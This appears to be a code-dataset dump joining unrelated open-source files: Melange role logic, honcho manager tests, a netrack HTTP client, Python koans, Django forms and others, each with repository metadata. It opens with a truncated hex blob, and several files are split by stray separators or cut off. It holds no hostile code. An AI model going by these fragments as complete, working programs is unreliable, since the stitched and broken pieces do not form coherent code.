\x36\x8d\xdc\xb3\x75\x52\x4c\x9b\x36\x99\x1e\xf2\x0a\x72\xb0\xc7\
\xde\x8c\xd8\x45\xa6\x83\xc6\xd4\xad\xd4\xa3\xcf\xa8\xc8\xce\x7d\
\x66\xea\xf4\xfc\x54\x99\x1c\xf3\x32\xff\x22\x20\xc2\x8b\x85\x65\
\xe0\xf6\xe3\xa3\x3c\x13\x5d\xb3\x17\x66\x4a\xfb\x3c\x13\xed\x98\
\x14\x72\x54\xc7\x64\x62\xdd\xea\x1e\x91\x23\xd7\x1d\xe7\x4a\xd1\
\x25\xb2\x75\xf5\xfc\x28\x71\x03\xd5\x6f\xa0\x03\x58\x14\xff\xf1\
\xe6\x6d\x3f\x82\x71\x9a\xc6\x7f\xd5\xcd\xe7\x61\x08\x8f\x54\x48\
\x1e\xeb\x3d\xec\x83\xf5\x30\x89\x97\x59\x1a\x03\x7a\x94\x49\xf7\
\x90\x97\xd0\x17\x12\x78\x7e\x04\xb4\x58\x3a\x7a\x62\xa6\xdc\x9d\
\x76\x42\x2f\xda\x2f\xdb\x88\x1e\x86\xae\x62\x71\x96\x96\xb9\x34\
\x72\x3e\x74\x79\x51\xbc\x97\x4e\x86\xbc\x8c\x45\xf3\xae\x10\x5a\
\xb8\x74\x86\xe8\x87\xdc\x1c\x23\xb9\xa5\x33\xe6\xae\x46\x1b\xbd\
\x27\xaa\x75\xae\x94\xa1\xde\xef\xca\x3a\x13\x83\xc2\xf9\x7c\x91\
\x3c\x8a\x62\x65\xfd\xf2\x28\x2a\x81\xe8\xb4\x9b\x22\xed\xc6\x08\
\xe5\xda\x72\xcc\xc7\xb6\x34\xe0\x10\xd3\x70\x3a\x0f\x1a\x15\x01\
\xbf\x98\x96\x1a\xad\x85\x10\x34\x13\x9f\x06\x6d\x77\x2a\x20\xae\
\xb6\x6b\xea\xcf\xa2\xef\xe3\x98\x60\x9f\x7b\xbe\x47\xf8\x54\x7d\
\x67\x33\xcb\xf4\x56\x62\xd9\xd9\x21\xba\x9e\x29\x1b\x33\xdd\x8c\
\xc1\x24\x4d\x9e\xd8\x83\x0e\x25\xf4\x3c\xc8\x75\x0d\x87\x54\xbd\
\xc7\x95\x6c\x8b\xe2\x5e\x49\x9e\xa4\x59\xd5\xcd\x64\x07\xb5\x0d\
\x71\x40\xc8\xfd\x60\xd5\x88\x2e\xdd\xce\x74\x5a\x38\x35\x71\xb8\
\x3b\xde\x17\x79\x25\x86\x03\x1a\x53\xcc\xfc\x7e\x7a\x9d\x94\x79\
\x71\x8a\x5f\x7d\x50\x7d\x85\x5e\x43\x9a\xe8\xf7\xa6\x7e\x75\x6f\
\x8f\xe9\xd8\xfd\x32\x3b\x91\xe6\xeb\x3c\x05\x2a\xaf\xab\x0b\x75\
\xf4\x41\x94\xb9\xfd\x73\x5d\x64\xaf\xee\x0b\xd1\x75\xa2\xb1\x25\
\xb9\x01\xea\xc7\x04\x5c\x1f\x00\x49\x67\x02\xa0\x8e\x22\x1e\x80\
\x58\x0d\xec\x01\x46\x63\x7a\xdf\x17\x09\x72\xa8\x84\x65\x76\x46\
\x27\x8e\x9d\x4f\xa7\x13\xb5\xdc\x25\xdd\x56\x9f\x0f\x50\xf8\x0d\
\x11\xec\xba\x9e\x0b\x0f\x5d\x04\x58\x02\x28\x7a\x87\x3c\x1c\x04\
\x1e\xd0\x45\x88\x3e\x21\x1f\x53\x2f\x92\x42\x17\xbb\x91\x0f\x48\
\xef\x83\x10\xfa\x80\x11\x1a\x04\x21\x87\x09\x86\x19\x8d\x24\x07\
\xa0\xd7\x88\x62\xee\x33\xc9\x34\x0b\x82\x43\xa2\x54\x80\x6e\x31\
\x0b\x03\xe9\x02\x84\x51\x10\x4a\xa1\x2f\x97\xe0\x81\xd4\xe4\x0b\
\x60\x89\x28\x0c\x5d\x57\xae\xcc\x30\x09\x95\x06\x2c\x0c\x8b\x45\
\x44\xda\x99\x61\xe8\x78\xd1\x3f\x2d\x9d\xcb\x7f\xdd\x08\xd1\xcd\
\x46\x88\xb0\xab\x1e\xc2\x64\x15\xfe\xc6\x06\x78\x27\x92\xa7\xd3\
\xab\xa9\xb0\x70\xb3\x22\x46\x46\xb2\x7e\xb2\x5e\x70\xde\x98\x81\
\x49\x97\x35\x2c\x51\x88\x09\xa3\xae\xef\x46\x50\x42\x5f\x6e\x53\
\x0a\x7b\xe7\x46\x44\x16\x65\x41\x60\x4f\xfb\x04\xe8\xc2\x86\xad\
\xe6\xea\xdd\x14\xba\x72\xff\x55\x01\xc9\xc2\x86\x02\x30\x1f\xe4\
\x0c\xc1\x0d\x2d\xf2\x98\xac\xb8\x52\xe9\x5f\x5d\x64\xcf\x2d\x27\
\xb1\xe9\x71\xd2\x61\xb2\xb8\x74\x70\x69\x48\x0d\x43\xb2\x18\x5d\
\xc2\xfb\xe0\x31\x58\xe8\x98\x66\x46\x83\xec\x0b\x2a\x65\xac\xd0\
\x58\x10\x67\x2a\x23\xf5\x22\x6f\xf4\x0d\x8b\xd0\x7e\x00\xaf\x6e\
\x24\xaf\xc4\xd1\x4c\x4a\x71\xd8\x5f\x5a\xfa\x35\x3c\xee\xf5\x03\
\xec\x31\x35\x49\xc9\x30\x36\x2d\x26\x61\xef\x89\x83\x27\xad\x20\
\x9b\xd2\x34\x30\xf4\x17\xa3\x03\xae\xc2\x54\xd1\x44\x0b\x1d\x82\
\x3d\xb3\x1a\x84\x53\x7e\xb4\xd7\x87\x1c\x65\x74\x51\x7f\x88\xe0\
\xbd\x0f\x99\xcb\x0c\x99\xda\x13\x3e\x17\x0e\xaf\x72\x11\x30\xf4\
\xf8\xb8\x07\xae\xaa\x85\xa7\x55\x54\x00\x17\x86\x4a\xaa\xfd\x69\
\xf9\x42\xfb\x9b\x09\x47\x33\xb2\x90\xee\x42\x34\x7a\x72\x17\x46\
\x2c\x17\xfa\x1c\x7d\x79\x29\x47\xd8\xbb\x71\x84\x29\x05\x48\xe5\
\xc4\x9b\x50\x78\x0b\x28\x0c\x01\xcb\x4d\x32\xd0\x8f\x7a\xd8\x07\
\xa8\xe4\x67\x20\xbc\x95\xc7\x8f\x72\x85\xc0\x0c\xce\x90\xcf\x49\
\x38\x43\x60\x06\x4d\x18\xc9\xd5\x0d\x04\x06\x97\x80\xc0\x52\x53\
\x03\xf0\x93\x6c\xe2\x50\xd5\x1d\x16\x85\xf3\x45\xe7\xf8\xab\x1c\
\x79\x7e\xf0\x72\x0a\x17\x4c\x85\x1b\xee\x3a\xcf\x5d\x4b\x08\x25\
\xff\x8b\x6b\xc9\x6c\x47\xfe\x3f\xee\x27\x36\xf9\xca\x0d\xa5\x44\
\xb2\x77\x43\x02\xdd\xb7\xa0\x3e\xe6\x24\xe2\xcf\xd0\x1b\xd3\xf4\
\x66\xca\x46\xd6\x30\xc8\xcd\xd3\xdc\x16\x4c\x24\xc6\x4d\x7e\x32\
\x84\xa3\x2b\x3e\xe3\xb5\x70\x22\xb6\x99\x70\x32\xd3\xac\x36\x91\
\x9a\x1f\x4e\x0c\x86\xe6\x26\xbd\xec\x39\x52\xe3\x26\xa9\xf1\x9e\
\xd4\xd8\x4c\x32\x12\x87\xc1\x67\x7c\x4e\x67\x1c\xcd\xd5\x47\x99\
\xa6\xcd\x9b\x64\xc6\x0d\x2e\xeb\xe9\x61\x22\xac\x6b\x24\x66\x70\
\x18\x7b\x86\xbe\x02\x4d\x5f\x73\xd9\x48\xc8\x3d\x79\x85\x9a\xb8\
\xdc\x69\x76\xc6\x3f\x33\xe1\x15\xda\xe2\x23\x6d\xf1\xb9\x6c\x30\
\x3a\x27\x2d\x6f\xa1\x43\x38\xd7\x7e\x41\xc8\x17
|
\xdd\xa0\x2c\x1f\
\x98\xc2\xe5\x6e\x10\xc9\x73\xe9\x47\x9c\x6b\xce\x0a\x28\x30\x89\
\xec\xe4\x50\xde\xe3\x23\x38\x14\x3e\xe1\x84\x02\x8f\x44\x38\x08\
\x89\x1b\xc8\xef\x06\x0e\x9d\x12\x81\x78\x6c\xf6\x60\x2a\x95\xaa\
\xb8\xaa\xa2\xaa\x85\x6a\x01\x8a\x03\x75\x8a\xa4\x82\xcf\x55\x2d\
\x35\x59\xa9\xd5\x3c\x37\x82\x68\xe4\x37\x0b\xb0\xa4\x2b\x71\xe2\
\x9d\x8e\xf1\xc5\x7c\x2c\xc0\xe7\xde\x8d\x9b\x86\x8b\x03\x4e\x
|
b8\
\xcf\x2f\xe1\x94\x6b\x34\xf5\x2e\xc1\xd4\xbb\x81\xa5\xfc\x0a\x94\
\x7a\xd7\x90\xd4\x04\xd2\x2b\x30\xfa\x35\x10\xe5\x97\x10\x7a\x1b\
\x40\x4d\xfc\xbc\x80\xcf\x6f\x43\xcf\x4b\xf0\x34\x3e\x04\xf8\x1c\
\x3a\xf9\xb7\x20\x27\xbf\x01\x9c\x9e\xc6\x4d\x7e\x09\x9b\xfc\xab\
\xa8\x79\x05\x34\xf9\x35\xcc\x34\x21\xf3\x0a\x62\x3e\x0f\x98\x97\
\x78\xf9\xf2\xe0\xd2\x77\xcf\x2f\x8a\xea\xcf\x52\xfe\xcf\xf2\xe1\
\xee\xdf\xfd\xc3\x1d\x1c\
\x00\x00\x0d\x5e\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\
|
MatthewWilkes/mw4068-packaging
|
src/melange/src/soc/logic/models/role.py
|
Python
|
apache-2.0
| 4,706
| 0.006587
|
#!/usr/bin/env python2.5
#
# Copyright 2008 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Role (Model) query functions.
"""
__authors__ = [
'"Daniel Hans" <daniel.m.hans@gmail.com>',
'"Sverre Rabbelier" <sverre@rabbelier.nl>',
'"Lennard de Rijk" <ljvderijk@gmail.com>',
]
from soc.cache import sidebar
from soc.logic.models import base
import soc.models.role
DEF_LAST_RESIGN_ERROR_FMT = "This user can't be " \
"resigned, please make sure it's not the last %(name)s."
# Registry mapping role_name -> Role Logic instance, populated via
# registerRoleLogic() when Logic instances are constructed.
ROLE_LOGICS = {}

# Role properties copied from a user's previous role when suggesting
# initial values for a new role form.
SUGGESTED_FIELDS = ['given_name', 'surname', 'name_on_documents', 'phone',
    'im_network', 'im_handle', 'home_page', 'blog', 'photo_url', 'latitude',
    'longitude', 'email', 'res_street', 'res_city', 'res_state', 'res_country',
    'res_postalcode', 'ship_street', 'ship_city', 'ship_state', 'ship_country',
    'ship_postalcode', 'birth_date', 'tshirt_size', 'tshirt_style'
    ]


def registerRoleLogic(role_logic):
  """Adds the specified Role Logic to the known ones.

  Args:
    role_logic: Instance of or subclass from Role Logic; its role_name
        attribute is used as the registry key.
  """
  # Mutating the module-level dict does not rebind the name, so the
  # previous 'global' statement was unnecessary and has been removed.
  name = role_logic.role_name
  ROLE_LOGICS[name] = role_logic
class Logic(base.Logic):
  """Logic methods for the Role model.
  """

  def __init__(self, model=soc.models.role.Role,
               base_model=None, scope_logic=None, role_name=None,
               disallow_last_resign=False):
    """Defines the name, key_name and model for this entity.

    Args:
      role_name: The name of this role used for instance for Requests
      disallow_last_resign: Iff True and a given role entity is the last of
        its kind in its scope then this role can not be resigned.
    """
    super(Logic, self).__init__(model, base_model=base_model,
                                scope_logic=scope_logic)
    self.role_name = role_name
    registerRoleLogic(self)
    self.disallow_last_resign = disallow_last_resign

  def _updateField(self, entity, entity_properties, name):
    """Special logic for role. If status changes to active we flush the sidebar.
    """
    value = entity_properties[name]
    if (name == 'status') and (entity.status != value) and value == 'active':
      # in case the status of the role changes to active we flush the sidebar
      # cache. Other changes will be visible after the retention time expires.
      sidebar.flush(entity.user.account)
    return True

  def _onCreate(self, entity):
    """Flush the sidebar cache when a new active role entity has been created.
    """
    if entity.status == 'active':
      sidebar.flush(entity.user.account)
    super(Logic, self)._onCreate(entity)

  def canResign(self, entity):
    """Checks if the current entity is allowed to be resigned.

    Args:
      entity: a Role entity

    Returns:
      - None if the entity is allowed to resign.
      - Error message otherwise.
    """
    if self.disallow_last_resign:
      # check if this is the last active role for its scope
      fields = {'scope': entity.scope,
                'status': 'active'}
      roles = self.getForFields(fields, limit=2)

      # if this is the last one return the error message
      if len(roles) <= 1:
        # NOTE(review): the %(name)s placeholder in the message is not
        # filled in here - presumably callers interpolate it; confirm.
        return DEF_LAST_RESIGN_ERROR_FMT

    # resignation is possible
    return None

  def getRoleLogicsToNotifyUponNewRequest(self):
    """Returns a list with subclasses of Role Logic which should be notified
    when a new request to obtain this Role arrives.

    Returns:
      A list with all Role Logics to notify
    """
    return []

  def getSuggestedInitialProperties(self, user):
    """Suggest role properties for a given user based on its previous entries.

    Args:
      user: a user entity

    Returns:
      A dict with values for fields defined in SUGGESTED_FIELDS or an empty
      dictionary if no previous roles were found.
    """
    # Renamed from 'filter' to avoid shadowing the builtin.
    role_filter = {
        'status': ['active', 'inactive'],
        'user': user,
        }

    # Take the first matching role from any registered Role Logic.
    role = None
    for role_logic in ROLE_LOGICS.values():
      role = role_logic.getForFields(role_filter, unique=True)
      if role:
        break

    if not role:
      return {}

    return dict([(field, getattr(role, field)) for field in SUGGESTED_FIELDS])
logic = Logic()
|
Jumpscale/jumpscale_portal8
|
apps/portalbase/macros/page/email/1_main.py
|
Python
|
apache-2.0
| 436
| 0.002294
|
from JumpScale.portal.macrolib import div_base
def main(j, args, params, *other_args):
    """Renders a self-closing <input type="email"> tag with an email pattern."""
    return div_base.macro(j, args, params, self_closing=True, tag='input',
                          additional_tag_params={'type': 'email',
                          'pattern': r"^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)+$"})
def match(j, args, params, tags, tasklet):
    """Always matches; this macro applies unconditionally."""
    return True
|
netrack/python-netrackclient
|
netrackclient/client.py
|
Python
|
lgpl-3.0
| 2,454
| 0
|
import sys
import json
import importlib
import http.client
import traceback
from netrackclient import broker
from netrackclient import errors
class HTTPClient(object):
    """Thin JSON-over-HTTP client bound to a base service URL."""

    def __init__(self, *args, **kwargs):
        super(HTTPClient, self).__init__()
        self._broker = broker.RequestBroker()
        # Base URL every request URI is appended to.
        self.service_url = kwargs.get("service_url")

    def _request(self):
        """Returns a broker request pre-configured for JSON payloads."""
        request = self._broker.http_request()
        request.add_header("Content-Type", "application/json")
        request.add_header("Accept", "application/json")
        return request

    def _check_response(self, response):
        """Raises errors.BaseError unless the response status is 200 OK."""
        if response.status() != http.client.OK:
            raise errors.BaseError(response.body())
        return response

    def get(self, uri, **kwargs):
        """Issues a GET request against service_url + uri."""
        request = self._request()
        url = self.service_url + uri
        return self._check_response(request.get(url, **kwargs))

    def put(self, uri, body, **kwargs):
        """Issues a PUT request with a JSON-encoded body."""
        request = self._request()
        url = self.service_url + uri
        body = json.dumps(body)
        return self._check_response(request.put(url, body, **kwargs))

    def delete(self, uri, body, **kwargs):
        """Issues a DELETE request with a JSON-encoded body."""
        request = self._request()
        url = self.service_url + uri
        body = json.dumps(body)
        return self._check_response(request.delete(url, body, **kwargs))
# Maps API version strings to "module.path:ClassName" entries.
__version_map = {
    "1": "netrackclient.netrack.v1.client:Client",
}


def get_client_class(version):
    """Resolves the client class for the given API version.

    Args:
        version: version key (anything str()-able), looked up in __version_map.

    Returns:
        The client class referenced by the matching version-map entry.

    Raises:
        errors.VersionError: if the version is unknown or the class is missing.
    """
    try:
        class_path = __version_map[str(version)]
        # Entries look like "package.module:ClassName".
        module_path, _, class_name = class_path.rpartition(":")
        module = importlib.import_module(module_path)
        return getattr(module, class_name)
    except AttributeError:
        # Bug fix: removed the stray extra ')' that unbalanced the message.
        msg = "Class {class_name} cannot be found ({exception})".format(
            class_name=class_name,
            exception=traceback.format_exception(*sys.exc_info()))
        raise errors.VersionError(msg)
    except (KeyError, ValueError):
        msg = "Invalid client version '{version}'. must be one of: ".format(
            version=version)
        msg += "{versions}".format(versions=", ".join(__version_map.keys()))
        raise errors.VersionError(msg)
def Client(version="1", *args, **kwargs):
    """Factory returning a versioned netrack client instance.

    Args:
        version: API version key; must be a key of __version_map.

    Raises:
        errors.VersionError: if the version is unknown.
    """
    client_class = get_client_class(version)
    return client_class(*args, **kwargs)
|
mcflugen/wmt-rest
|
wmt/flask/components/__init__.py
|
Python
|
mit
| 155
| 0.006452
|
from flask import current_app
from ..core import Service, db
from .models import Component
class ComponentsService(Service):
    """Service layer class operating on Component records."""

    # Model class this service is bound to (consumed by the Service base).
    __model__ = Component
|
DarthStrom/python_koans
|
python2/koans/about_dictionaries.py
|
Python
|
mit
| 1,970
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutHashes in the Ruby Koans
#
from runner.koan import *
class AboutDictionaries(Koan):
    # Koan exercise: the '__' placeholders are intentionally left for the
    # student to fill in; only the garbled assignment line was repaired.

    def test_creating_dictionaries(self):
        empty_dict = dict()
        self.assertEqual(dict, type(empty_dict))
        self.assertEqual(dict(), empty_dict)
        self.assertEqual(0, len(empty_dict))

    def test_dictionary_literals(self):
        empty_dict = {}
        self.assertEqual(dict, type(empty_dict))
        babel_fish = {'one': 'uno', 'two': 'dos'}
        self.assertEqual(__, len(babel_fish))

    def test_accessing_dictionaries(self):
        babel_fish = {'one': 'uno', 'two': 'dos'}
        self.assertEqual(__, babel_fish['one'])
        self.assertEqual(__, babel_fish['two'])

    def test_changing_dictionaries(self):
        babel_fish = {'one': 'uno', 'two': 'dos'}
        babel_fish['one'] = 'eins'
        expected = {'two': 'dos', 'one': __}
        self.assertEqual(expected, babel_fish)

    def test_dictionary_is_unordered(self):
        dict1 = {'one': 'uno', 'two': 'dos'}
        dict2 = {'two': 'dos', 'one': 'uno'}
        self.assertEqual(____, dict1 == dict2)

    def test_dictionary_keys_and_values(self):
        babel_fish = {'one': 'uno', 'two': 'dos'}
        self.assertEqual(__, len(babel_fish.keys()))
        self.assertEqual(__, len(babel_fish.values()))
        self.assertEqual(__, 'one' in babel_fish.keys())
        self.assertEqual(__, 'two' in babel_fish.values())
        self.assertEqual(__, 'uno' in babel_fish.keys())
        self.assertEqual(__, 'dos' in babel_fish.values())

    def test_making_a_dictionary_from_a_sequence_of_keys(self):
        cards = {}.fromkeys(
            ('red warrior', 'green elf', 'blue valkyrie', 'yellow dwarf',
             'confused looking zebra'),
            42)
        self.assertEqual(__, len(cards))
        self.assertEqual(__, cards['green elf'])
        self.assertEqual(__, cards['yellow dwarf'])
|
gkc1000/pyscf
|
pyscf/tddft/__init__.py
|
Python
|
apache-2.0
| 660
| 0
|
#!
|
/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distrib
|
uted on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyscf.tdscf import *
|
nickstenning/honcho
|
tests/test_manager.py
|
Python
|
mit
| 8,625
| 0.000116
|
import datetime
import queue
import multiprocessing
import pytest
from honcho.printer import Message
from honcho.manager import Manager
from honcho.manager import SYSTEM_PRINTER_NAME
# Scripted process lifecycles replayed through the Manager in tests.
# Each history declares the processes to register plus the ordered
# (process_name, message_type, payload) messages the harness feeds to
# the manager's event queue.
HISTORIES = {
    # One process: starts, prints a line, exits cleanly.
    'one': {
        'processes': {'foo': {}},
        'messages': (('foo', 'start', {'pid': 123}),
                     ('foo', 'line', b'hello, world!\n'),
                     ('foo', 'stop', {'returncode': 0})),
    },
    # Two interleaved processes, both exiting cleanly.
    'two': {
        'processes': {'bar': {}, 'foo': {}},
        'messages': (('foo', 'start', {'pid': 123}),
                     ('bar', 'start', {'pid': 124}),
                     ('foo', 'line', b'process one\n'),
                     ('bar', 'line', b'process two\n'),
                     ('foo', 'stop', {'returncode': 0}),
                     ('bar', 'stop', {'returncode': 0})),
    },
    # Both processes exit with non-zero return codes.
    'returncode': {
        'processes': {'bar': {}, 'foo': {}},
        'messages': (('foo', 'start', {'pid': 123}),
                     ('bar', 'start', {'pid': 124}),
                     ('foo', 'stop', {'returncode': 456}),
                     ('bar', 'stop', {'returncode': 321})),
    },
    # 'bar' keeps emitting output after 'foo' has already stopped,
    # then is terminated (-15 == SIGTERM).
    'output_after_stop': {
        'processes': {'bar': {}, 'foo': {}},
        'messages': (('foo', 'start', {'pid': 123}),
                     ('bar', 'start', {'pid': 124}),
                     ('foo', 'line', b'hi from foo\n'),
                     ('bar', 'line', b'hi from bar\n'),
                     ('foo', 'stop', {'returncode': 0}),
                     ('bar', 'line', b'fishmongers\n'),
                     ('bar', 'line', b'butchers\n'),
                     ('bar', 'stop', {'returncode': -15})),
    },
}
class FakeClock(object):
    """Clock stub whose now() always reports the same frozen instant."""

    # The single timestamp every call to now() returns.
    _FROZEN = datetime.datetime(2012, 8, 11, 12, 42)

    def now(self):
        """Return the frozen datetime, regardless of wall-clock time."""
        return self._FROZEN
class FakeProcessManager(object):
    """No-op stand-in for the OS-level process manager used by Manager."""

    def terminate(self, pid):
        """Pretend to terminate *pid*; intentionally does nothing."""
        return None

    def kill(self, pid):
        """Pretend to kill *pid*; intentionally does nothing."""
        return None
class FakeProcess(object):
    """Test double for honcho's Process: records events instead of spawning."""

    def __init__(self, cmd, name=None, colour=None, quiet=None, env=None, cwd=None):
        # Mirrors the real Process constructor signature verbatim.
        self.cmd = cmd
        self.name = name
        self.colour = colour
        self.quiet = quiet
        self.env = env
        self.cwd = cwd

        # Event sink (queue-like object with .put); the harness attaches one.
        self._events = None
        self._options = {}

    def run(self, events=None, ignore_signals=False):
        """Record a 'run' event instead of executing the command."""
        self._report('run', events_passed=events is not None)

    def _report(self, type, **data):
        # Drop events silently until a sink has been attached.
        if self._events is None:
            return
        data['type'] = type
        data['name'] = self.name
        self._events.put(data)
class Harness(object):
    """Drives a Manager through a scripted history in a child process.

    The manager's loop() runs in a separate multiprocessing.Process while
    this harness replays the history's messages into the manager's event
    queue; FakeProcess events are collected on a shared queue for assertions.
    """

    def __init__(self, history, manager):
        self.history = history
        self.manager = manager
        # Local cache of events drained from the cross-process queue.
        self.events_local = []
        self._q = multiprocessing.Queue()
        # -999 is a sentinel meaning "the manager loop has not finished yet".
        self._rc = multiprocessing.Value('i', -999)

    def run(self, wait=True):
        # NOTE(review): the `wait` flag is accepted but never used here.
        # Swap in our factory so the manager builds FakeProcess instances.
        self.manager._process_ctor = self._process_ctor

        for name, options in self.history['processes'].items():
            self.manager.add_process(name,
                                     options.get('command', 'test'),
                                     options.get('quiet', False))

        def _loop(rc):
            self.manager.loop()
            rc.value = self.manager.returncode

        self._mproc = multiprocessing.Process(target=_loop, args=(self._rc,))
        self._mproc.start()

        # Replay the scripted messages into the manager's event queue,
        # then wait for the child loop to drain them and exit.
        for msg in self.history['messages']:
            self.send_manager(*msg)

        self._mproc.join()

    @property
    def manager_returncode(self):
        # None until the child loop has written a real return code.
        if self._rc.value == -999:
            return None
        return self._rc.value

    def send_manager(self, process_name, type, data, **kwargs):
        """Inject one (type, data) message for *process_name* into the manager."""
        self.manager.events.put(Message(type=type,
                                        data=data,
                                        time=datetime.datetime.now(),
                                        name=process_name,
                                        colour=None))

    def fetch_events(self):
        """
        Retrieve any pending events from the queue and put them on the local
        event cache
        """
        while 1:
            try:
                self.events_local.append(self._q.get(False))
            except queue.Empty:
                break

    def find_events(self, name=None, type=None):
        """Return cached events, optionally filtered by process name and/or type."""
        self.fetch_events()
        results = []
        for event in self.events_local:
            if name is not None and event['name'] != name:
                continue
            if type is not None and event['type'] != type:
                continue
            results.append(event)
        return results

    def _process_ctor(self, *args, **kwargs):
        # Factory handed to the Manager: builds FakeProcess instances wired
        # to this harness's event queue instead of spawning real processes.
        options = self.history['processes'][kwargs['name']]
        p = FakeProcess(*args, **kwargs)
        p._events = self._q
        p._options = options
        return p
class FakePrinter(object):
    """Printer double that captures written messages on a cross-process queue."""

    def __init__(self, width=0):
        self.width = width
        # Messages already drained from the queue.
        self.lines_local = []
        self._q = multiprocessing.Queue()

    def write(self, message):
        # Called in a remote thread, so just put the message on the queue.
        self._q.put(message)

    def fetch_lines(self):
        """Drain any pending messages from the queue into lines_local."""
        while True:
            try:
                self.lines_local.append(self._q.get(False))
            except queue.Empty:
                return

    def got_line(self, data):
        """Return True if some captured message carries exactly *data*."""
        return self.find_line(data) is not None

    def find_line(self, data):
        """Return the first captured message whose .data equals *data*, else None."""
        self.fetch_lines()
        for msg in self.lines_local:
            if msg.data == data:
                return msg
        return None
class TestManager(object):
@pytest.fixture(autouse=True)
def printer(self): # noqa
self.p = FakePrinter()
self.m = Manager(printer=self.p)
self.m._clock = FakeClock()
self.m._procmgr = FakeProcessManager()
def run_history(self, name, wait=True):
self.h = Harness(HISTORIES[name], self.m)
self.h.run(wait=wait)
def test_init_sets_default_printer_width(self):
assert self.p.width == len(SYSTEM_PRINTER_NAME)
def test_add_process_updates_printer_width(self):
self.m.add_process('interesting', 'ruby server.rb')
assert self.p.width == len('interesting')
def test_add_process_sets_name(self):
proc = self.m.add_process('foo', 'ruby server.rb')
assert proc.name == 'foo'
def test_add_process_sets_cmd(self):
proc = self.m.add_process('foo', 'ruby server.rb')
assert proc.cmd == 'ruby server.rb'
def test_add_process_sets_colour(self):
proc = self.m.add_process('foo', 'ruby server.rb')
assert proc.colour is not None
def test_add_process_sets_unique_colours(self):
p1 = self.m.add_process('foo', 'ruby server.rb')
p2 = self.m.add_process('bar', 'python server.py')
assert p1.colour != p2.colour
def test_add_process_sets_quiet(self):
proc = self.m.add_process('foo', 'ruby server.rb', quiet=True)
assert proc.quiet
def test_add_process_name_must_be_unique(self):
self.m.add_process('foo', 'ruby server.rb')
with pytest.raises(AssertionError):
self.m.add_process('foo', 'another command')
def test_add_process_sets_cwd(self):
proc = self.m.add_process('foo', 'ruby server.rb', cwd='foo-dir')
assert proc.cwd == 'foo-dir'
def test_loop_with_empty_manager_returns_immediately(self):
self.m.loop()
def test_loop_calls_process_run(self):
self.run_history('one')
evts = self.h.find_events(type='run')
assert len(evts) == 1
assert evts[0]['name'] == 'foo'
assert evts[0]['events_passed']
def test_printer_receives_messages_in_correct_order(self):
self.run_history('one')
self.p.fetch_lines()
assert self.p.lines_local[0].data == 'foo started (pid=123)\n'
assert self.p.lines_local[1].data == b'hello, world!\n'
assert self.p.lines_local[2].data == 'foo stopped (rc=0)\n'
def test_printer_receives_lines_multi_process(self):
self.run_history('two')
l1 = self.p.find_line(b'process one\n')
l2
|
jhunkeler/hstcal
|
tests/wfc3/test_uvis_13single.py
|
Python
|
bsd-3-clause
| 864
| 0.003472
|
import subprocess
import pytest
from ..helpers import BaseWFC3
class TestUVIS13Single(BaseWFC3):
    """
    Test pos UVIS2 DARK images
    """
    # Detector selector consumed by the BaseWFC3 fixture machinery.
    detector = 'uvis'

    def _single_raw_calib(self, rootname):
        """Run CALWF3 on one raw exposure and diff the FLT product vs reference."""
        raw_file = '{}_raw.fits'.format(rootname)

        # Prepare input file.
        self.get_input_file(raw_file)

        # Run CALWF3
        subprocess.call(['calwf3.e', raw_file, '-vt'])

        # Compare results: (produced, reference) file pairs.
        outputs = [('{}_flt.fits'.format(rootname),
                    '{}_flt_ref.fits'.format(rootname))]
        self.compare_outputs(outputs)

    # Ported from ``calwf3_uv_13``.
    # NOTE(review): only the first rootname is active; the full dataset list
    # below is kept commented out — presumably to shorten CI time. Confirm.
    @pytest.mark.parametrize(
        'rootname', ['iaao09l2q'])
    # 'rootname', ['iaao09l2q', 'iaao09l3q', 'iaao11ofq', 'iaao11ogq', 'iblk57c1q'])
    def test_uvis_13single(self, rootname):
        self._single_raw_calib(rootname)
|
Kentoseth/rangoapp
|
tango_with_django_project/rango/forms.py
|
Python
|
mit
| 1,390
| 0.035971
|
from django import forms
from rango.models import Page, Category
from rango.models import UserProfile
from
|
django.contrib.auth.models import User
class CategoryForm(forms.ModelForm):
    """Form for creating a Category; counters are hidden and start at zero."""

    name = forms.CharField(max_length=128, help_text="Please enter the category name.")
    # Hidden counters: users must not edit view/like totals directly.
    views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)
    likes = forms.IntegerField(widget=forms.HiddenInput(), initial=0)

    class Meta:
        # Provide an association between the ModelForm and a model
        model = Category
        # NOTE(review): no `fields`/`exclude` declared — newer Django versions
        # raise ImproperlyConfigured for this. Confirm the Django version in use.
class PageForm(forms.ModelForm):
    """Form for creating a Page; normalises the URL scheme on clean()."""

    title = forms.CharField(max_length=128, help_text="Please enter title of the page")
    url = forms.URLField(max_length=200, help_text="Please enter URL of the page")
    # Hidden counter: users must not edit the view total directly.
    views = forms.IntegerField(widget=forms.HiddenInput(), initial=0)

    class Meta:
